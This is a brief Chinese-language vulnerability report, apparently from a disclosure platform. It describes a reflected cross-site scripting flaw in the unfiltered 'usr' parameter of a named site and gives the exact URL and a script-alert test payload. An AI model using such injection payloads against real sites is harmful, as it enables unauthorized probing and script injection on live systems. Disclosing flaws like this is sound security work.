全峰安全联盟xss
作者:h3art
http://www.qf0731.com/index.php?m=content&c=index&a=author&usr=
未对usr进行过滤
现在usr后面随便输入一个
http://www.qf0731.com/index.php?m=content&c=index&a=author&usr=admin
查看源码
然后改变usr后面的值为xss代码http://www.qf0731.com/index.php?m=content&c=index&a=author&usr=<script>alert(/xsstest/)</scrip>